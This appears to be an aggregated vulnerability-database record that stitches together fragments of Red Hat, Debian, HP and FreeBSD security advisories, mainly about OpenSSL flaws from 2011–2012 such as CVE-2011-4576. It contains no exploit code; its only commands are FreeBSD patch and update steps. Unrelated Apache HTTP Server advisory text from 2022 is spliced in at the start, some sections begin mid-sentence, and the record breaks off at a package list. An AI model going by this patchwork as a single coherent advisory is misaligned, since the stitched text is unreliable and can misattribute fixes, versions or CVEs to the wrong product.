https://access.redhat.com/security/cve/CVE-2022-29404 https://access.redhat.com/security/cve/CVE-2022-30522 https://access.redhat.com/security/cve/CVE-2022-30556 https://access.redhat.com/security/cve/CVE-2022-31813 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/6975397 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYzXoqNzjgjWX9erEAQhSKA//d1V5w3Dbdd0R1QxlXMIweLpztJrkXpmN EY7WAFIMy0MG64KNjZFF5i4USpUlCm/tZX/fHZas4JjhZBqLxNSqsOdPeynDqp+8 qZnnGiIhyO37S7x5v89VSaWngLpTi2f0d7RmJ05VJzAP8Q0a9cTqtIZiCsM18tTg BdoD1M/VWUhtPWCzgXiQVI8yF44IOenN2095OCv1Vxc3kiwQdbWcd7Uqz2TgVQ1m qeqh9AHqaDTwHVM9Ipj5oGp1Ue5zsyAEd77ClBCAzP3p7bWucfTErDrUSE3/hkDm H8BlPVPaOsRv0poFvvCODQhccC2bFc3uxoKzfSx+/WwkrU7vO/5/npmOfcwKfvBQ FYqhqADiUcfpJGENligpNAHLI+Pijrl2Tfwl0XbDa8+7KXQ0T75VG3Gq7dFlPcUm 965hFguLI0es2FpGcJldEqsc1XJxdkPmzTYhqDWLLED5X72dwQdtKwhMaFFVctK+ KyspQqaci6bVr9ETF89r0ZBmnxXjSIY7/ijySy0KnldW25t+ZGmLV4pM3CYb7ZVz qEm9I/oRD0JB/4C5Bk9j5nWF3gzE2MhYfeepqINGIbfvNPiP8G2LFL/CEz46isF9 rFUT/az/p5mdNEwwe5GhEgLkpk0fhcZiAtJ4bGRcJ9YRURh5rrMPtXmXP5THoMau 3VmN11LnfT4= =pvMD -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . For the oldstable distribution (buster), these problems have been fixed in version 2.4.38-3+deb10u6. For the stable distribution (bullseye), these problems have been fixed in version 2.4.51-1~deb11u1. We recommend that you upgrade your apache2 packages. For the detailed security status of apache2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/apache2 Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmFgr44ACgkQEMKTtsN8 TjbophAAiZ+fhF2r8BUbQkL8BhpfqjA+hVsp9WEMTn8Gq6kiW0wLvK3jWPM301Ou D4gHqKmFPmYNC1KBOyk/lJdxyD7iTUweUyLi3WXzxhIDMx0kxkRw1oXlyCHzIqSJ M277bgk32h2cDCbsXjrN/8agKPcKgfwDqiyf/igfEq6V8OB2zVvJPKVFq45n54+q 4FPXSyx1g2u5ewSeXbU2uHDej6Qborui4osDdbwx8CT6aETi0cIXJ8RbXF3PUCHG 5DzZagnRq6GumPsl01jcPu7b9Ck8MlkxMSG3FRsSIJVkwpsQ2C34ywIJkFlzUZZh jhdVUrfbyfLpSdcPcipAAjl9I6gDqa9SFdMRK7ixCpQ6iTiVeDZdJ8pA4jnSweNQ THik07di9R0juX0p7peQiIyBKrEf7Y3WSvLOn0SBKXvZnzc/72rH2nP5FclsgCsV TWxptziGridC43KB8/tDJAAOXVF2lzylzF70V/UGTNo1jk9w3/p6btU1iuzKspyY Y4aPZla3DImI8mezrgFrGYNg7bZYLKuJyGDADKih2sUQpzmDZ6MJxKAE3NLRWyQa 7cCJdoNR9yVqytEw1Y/ZRXAXWfMb3Y1ts2EqR8hzLQgMYb0JC58cLMG3T0RgyPoO A4CTIoYpK1WnsykAE8M4XFrnOW3lrtse6T8N/dTVMuodElAEhc0= =/At6 -----END PGP SIGNATURE----- . This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Service Pack 10, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References
var-201201-0030 The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. Warning: Before applying this update, back up your existing JBoss Enterprise Application Platform installation and deployed applications, and also back up your existing Apache HTTP Server installation (including all applications and configuration files). All users of JBoss Enterprise Application Platform 6.0.0 for Solaris and Microsoft Windows as provided from the Red Hat Customer Portal are advised to apply this update. Solution: The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Application Platform installation and deployed applications, and also back up your existing Apache HTTP Server installation (including all applications and configuration files). HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows. HP System Management Homepage v7.1.1 is available here: HP System Management Homepage for Windows x64 [Download here] or enter the following URL into the browser address window. http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken HP System Management Homepage for Windows x86 [Download here] or enter the following URL into the browser address window. http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken HP System Management Homepage for Linux (AMD64/EM64T) [Download here] or enter the following URL into the browser address window. http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken HP System Management Homepage for Linux (x86) [Download here] or enter the following URL into the browser address window. Relevant releases/architectures: RHEV Hypervisor for RHEL-5 - noarch 3. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. (CVE-2012-0029) A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service. (CVE-2012-0207) A double free flaw was discovered in the policy checking code in OpenSSL. (CVE-2011-4619) Red Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029, and Simon McVittie for reporting CVE-2012-0207. The security fixes included in this update address the following CVE numbers: CVE-2006-1168 and CVE-2011-2716 (busybox issues) CVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc issues) CVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and CVE-2012-0028 (kernel issues) CVE-2011-1526 (krb5 issue) CVE-2011-4347 (kvm issue) CVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 and CVE-2011-1944 (libxml2 issues) CVE-2011-1749 (nfs-utils issue) CVE-2011-4108 (openssl issue) CVE-2011-0010 (sudo issue) CVE-2011-1675 and CVE-2011-1677 (util-linux issues) CVE-2010-0424 (vixie-cron issue) This updated rhev-hypervisor5 package fixes various bugs. Bugs fixed (http://bugzilla.redhat.com/): 606191 - after upgrade , reboot can't shut off network successfully and back to firstboot menu again 627538 - System will not boot sometimes when using rhevm to do upgrade twice. 650179 - rhevm bridge came up instead of breth0 after fail to configure network 675325 - Changes to networking always clear the contents of resolv.conf 696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning 717535 - [RFE] No confirm message for ntp server setting 728895 - RHEV-H rpm should include a versions text file 732948 - CCISS: Auto install fail at creating physical volume. 734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0 734480 - [RFE] Add virt-who package to RHEVH 734710 - Register RHN satellite will fail if RHN satellite password include space. 740127 - Provide our CPE name in a new system file 743938 - Make rhev-hypervisor RPM multi-installable like the kernel 747519 - RHEV-H 5.8 register to RHN will fail. 747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6 756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils 758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces 759462 - Can not retrieve running guests UUID in RHEVH node. 759632 - virt-who debugging output going to stderr always 759635 - Revert workaround of virt-who output 761357 - Multipathd service is stopped by default cause change password failed in single mode. 768256 - network layout is incorrect when configure network with nic up 771771 - CVE-2011-4109 openssl: double-free in policy checks 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771780 - CVE-2011-4619 openssl: SGC restart DoS attack 772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow 772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries 783625 - The setup command should only allow password setting and viewing logs in single mode. Corrected: 2012-05-03 15:25:11 UTC (RELENG_7, 7.4-STABLE) 2012-05-03 15:25:11 UTC (RELENG_7_4, 7.4-RELEASE-p7) 2012-05-03 15:25:11 UTC (RELENG_8, 8.3-STABLE) 2012-05-03 15:25:11 UTC (RELENG_8_3, 8.3-RELEASE-p1) 2012-05-03 15:25:11 UTC (RELENG_8_2, 8.2-RELEASE-p7) 2012-05-03 15:25:11 UTC (RELENG_8_1, 8.1-RELEASE-p9) 2012-05-03 15:25:11 UTC (RELENG_9, 9.0-STABLE) 2012-05-03 15:25:11 UTC (RELENG_9_0, 9.0-RELEASE-p1) CVE Name: CVE-2011-4576, CVE-2011-4619, CVE-2011-4109, CVE-2012-0884, CVE-2012-2110 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:http://security.FreeBSD.org/>. Background FreeBSD includes software from the OpenSSL Project. II. This could include sensitive contents of previously freed memory. [CVE-2011-4109] A weakness in the OpenSSL PKCS #7 code can be exploited using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the million message attack (MMA). [CVE-2012-0884] The asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp functions, in OpenSSL contains multiple integer errors that can cause memory corruption when parsing encoded ASN.1 data. This error can occur on systems that parse untrusted ASN.1 data, such as X.509 certificates or RSA public keys. [CVE-2012-2110] III. Impact Sensitive contents of the previously freed memory can be exposed when communicating with a SSL 3.0 peer. However, FreeBSD OpenSSL version does not support SSL_MODE_RELEASE_BUFFERS SSL mode and therefore have a single write buffer per connection. That write buffer is partially filled with non-sensitive, handshake data at the beginning of the connection and, thereafter, only records which are longer than any previously sent record leak any non-encrypted data. This, combined with the small number of bytes leaked per record, serves to limit to severity of this issue. [CVE-2011-4619] The double-free, when an application performs X509 certificate policy checking, can lead to denial of service in that application. [CVE-2011-4109] A weakness in the OpenSSL PKCS #7 code can lead to a successful Bleichenbacher attack. Only users of PKCS #7 decryption operations are affected. A successful attack needs on average 2^20 messages. In practice only automated systems will be affected as humans will not be willing to process this many messages. SSL/TLS applications are not affected. [CVE-2012-0884] The vulnerability in the asn1_d2i_read_bio() OpenSSL function can lead to a potentially exploitable attack via buffer overflow. The SSL/TLS code in OpenSSL is not affected by this issue, nor are applications using the memory based ASN.1 functions. There are no applications in FreeBSD base system affected by this issue, though some 3rd party consumers of these functions might be vulnerable when processing untrusted ASN.1 data. [CVE-2012-2110] IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE or 9-STABLE, or to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, RELENG_9_0 security branch dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to FreeBSD 7.4, 8.3, 8.2, 8.1, and 9.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch # fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system as described in <URL: http://www.freebsd.org/handbook/makeworld.html> and reboot the system. NOTE: Any third-party applications, including those installed from the FreeBSD ports collection, which are statically linked to libcrypto(3) should be recompiled in order to use the corrected code. 3) To update your vulnerable system via a binary patch: Systems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE or 9.0-RELEASE on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - ------------------------------------------------------------------------- RELENG_7 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.2 src/crypto/openssl/crypto/mem.c 1.1.1.8.2.2 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.2 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.2 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.2.1 src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.2 src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.3 src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.7 src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.3 src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.2 src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.2 RELENG_7_4 src/UPDATING 1.507.2.36.2.9 src/sys/conf/newvers.sh 1.72.2.18.2.12 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.1.2.1 src/crypto/openssl/crypto/mem.c 1.1.1.8.2.1.2.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.1.2.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.1.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.20.1 src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.1.2.1 src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.2.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.5.2.1 src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.2.2.1 src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.1.2.1 src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.1.2.1 RELENG_8 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.2 src/crypto/openssl/crypto/mem.c 1.2.2.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.2.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.2 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.10.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.2.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.2 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.5 src/crypto/openssl/ssl/ssl.h 1.2.2.2 src/crypto/openssl/ssl/s3_enc.c 1.2.2.2 src/crypto/openssl/ssl/ssl3.h 1.2.2.2 RELENG_8_3 src/UPDATING 1.632.2.26.2.3 src/sys/conf/newvers.sh 1.83.2.15.2.5 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.4.1 src/crypto/openssl/crypto/mem.c 1.2.14.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.14.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.6.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.26.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.14.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.6.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.4.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.6.1 src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.4.1 src/crypto/openssl/ssl/ssl3.h 1.2.2.1.6.1 RELENG_8_2 src/UPDATING 1.632.2.19.2.9 src/sys/conf/newvers.sh 1.83.2.12.2.12 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.2.1 src/crypto/openssl/crypto/mem.c 1.2.8.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.8.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.4.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.18.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.8.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.4.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.3.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.4.1 src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.2.1 src/crypto/openssl/ssl/ssl3.h 1.2.2.1.4.1 RELENG_8_1 src/UPDATING 1.632.2.14.2.12 src/sys/conf/newvers.sh 1.83.2.10.2.13 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.16.1 src/crypto/openssl/crypto/mem.c 1.2.6.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.6.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.16.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.6.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.2.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.2.1 src/crypto/openssl/ssl/s3_enc.c 1.2.6.1 src/crypto/openssl/ssl/ssl3.h 1.2.2.1.2.1 RELENG_9 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.2.1 src/crypto/openssl/crypto/mem.c 1.2.10.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.10.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.22.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.10.1 src/crypto/openssl/ssl/ssl_err.c 1.3.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.7.2.1 src/crypto/openssl/ssl/ssl.h 1.3.2.1 src/crypto/openssl/ssl/s3_enc.c 1.3.2.1 src/crypto/openssl/ssl/ssl3.h 1.3.2.1 RELENG_9_0 src/UPDATING 1.702.2.4.2.3 src/sys/conf/newvers.sh 1.95.2.4.2.5 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.4.1 src/crypto/openssl/crypto/mem.c 1.2.12.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.12.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.4.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.24.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.12.1 src/crypto/openssl/ssl/ssl_err.c 1.3.4.1 src/crypto/openssl/ssl/s3_srvr.c 1.7.4.1 src/crypto/openssl/ssl/ssl.h 1.3.4.1 src/crypto/openssl/ssl/s3_enc.c 1.3.4.1 src/crypto/openssl/ssl/ssl3.h 1.3.4.1 - - ------------------------------------------------------------------------- Subversion: Branch/path Revision - - ------------------------------------------------------------------------- stable/7/ r234954 releng/7.4/ r234954 stable/8/ r234954 releng/8.3/ r234954 releng/8.2/ r234954 releng/8.1/ r234954 stable/9/ r234954 releng/9.0/ r234954 - - ------------------------------------------------------------------------- VII. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: openssl security update Advisory ID: RHSA-2012:0059-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html Issue date: 2012-01-24 CVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 CVE-2011-4619 ===================================================================== 1. Summary: Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle. (CVE-2011-4108) An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. (CVE-2011-4576) A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data. (CVE-2011-4577) It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2011-4619) All OpenSSL users should upgrade to these updated packages, which contain backported patches to resolve these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures 771780 - CVE-2011-4619 openssl: SGC restart DoS attack 6. Package List: Red Hat Enterprise Linux Desktop (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm ppc64: openssl-1.0.0-20.el6_2.1.ppc.rpm openssl-1.0.0-20.el6_2.1.ppc64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-devel-1.0.0-20.el6_2.1.ppc.rpm openssl-devel-1.0.0-20.el6_2.1.ppc64.rpm s390x: openssl-1.0.0-20.el6_2.1.s390.rpm openssl-1.0.0-20.el6_2.1.s390x.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-devel-1.0.0-20.el6_2.1.s390.rpm openssl-devel-1.0.0-20.el6_2.1.s390x.rpm x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm ppc64: openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-perl-1.0.0-20.el6_2.1.ppc64.rpm openssl-static-1.0.0-20.el6_2.1.ppc64.rpm s390x: openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-perl-1.0.0-20.el6_2.1.s390x.rpm openssl-static-1.0.0-20.el6_2.1.s390x.rpm x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: 